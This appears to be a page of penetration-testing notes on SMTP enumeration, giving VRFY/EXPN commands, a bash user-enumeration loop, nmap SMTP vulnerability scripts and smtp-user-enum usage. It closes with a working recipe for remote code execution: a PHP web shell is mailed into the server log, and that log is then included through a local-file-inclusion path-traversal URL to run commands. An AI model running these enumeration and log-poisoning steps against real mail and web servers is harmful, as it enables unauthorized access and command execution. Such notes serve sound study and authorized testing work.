Hack$Notes
Search…
SMTP Enum

CheckList

  • Check for version
  • LFI chaining log file poisoning
  • User enumeration

Grab the banner and VRFY

nc -nv 10.11.12.8 25
VRFY bob
250 2.1.5
[email protected] <--- Output if user exists
VRFY idontexist
550 5.1.1 idontexist... User unknow <--- Output if user does not exist
EXPN request: asks the server for the membership of a mailing list

Bash Script for SMTP

#!/bin/bash
# VRFY Script
#############
for ips in $(cat numbers.txt); # numbers.txt list of IP's
do
for user in $(cat users.txt); # users.txt list of usernames
do
echo VRFY $user | nc -nv -w 1 10.11.1.$ips 25 2>/dev/null |grep ^"250"
done
done

SMTP nmap scripts

nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1

SMTP user enum

smtp-user-enum -M VRFY -D domain.here -u username -t 10.10.10.10
smtp-user-enum -M VRFY -U usernamelist.txt -t 10.10.10.10

Code Execution through SMTP/LFI

telnet 10.10.10.10 25
EHLO sub.somedomain.com
data
Subject: Some Subject
<?php echo system($_REQUEST['cmd']); ?>
.
=================================================
After this and on the LFI you have discovered just place the variable cmd:
?cmd=id
&cmd=id
Examples:
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=whoami
Last modified 1yr ago